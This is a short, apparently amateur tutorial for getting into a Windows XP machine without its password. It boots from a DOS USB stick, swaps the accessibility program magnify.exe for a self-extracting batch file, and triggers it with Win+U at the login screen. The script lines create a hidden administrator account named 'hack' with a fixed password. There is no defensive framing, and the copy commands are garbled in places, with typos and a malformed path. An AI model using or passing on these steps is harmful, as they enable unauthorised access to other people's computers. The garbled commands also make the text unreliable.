Step 1: Download related software.
HP USB Disk Storage Format tool
Step 2: Plug in usb drive and start HP USB tools.
Select FAT format for DOS mode.
Option -- Create a DOS startup disk.
Step 3: Start USBoot.
Select the usb drive.
Use ZIP format.
Step 4: Prepare scripts.
Key in the following scripts:
net user hack 123456 /add
net localgroup administrators hack /add
save as: login.bat
Step 5: rar the bat file with winrar.
make it self extractable.
extract path be % temp%
after extraction execute program.
Step 6: change login.exe to mafnify.exe and copy it to usb.
Chack magnify.exe and DOS files must in usb.
Step 7: The process.
Boot usb into DOS.
Enter login screen.
use win+U to activate magnify.exe.
add new user.
user: hack
password: 123456
Now we can enter windows xp.
Step 8: At dos enter the following:
cd c:\windows\system32
copy magnify.exe magnify2.exe
copy x:\magnify.exe c:\windows\system32magnify2.exe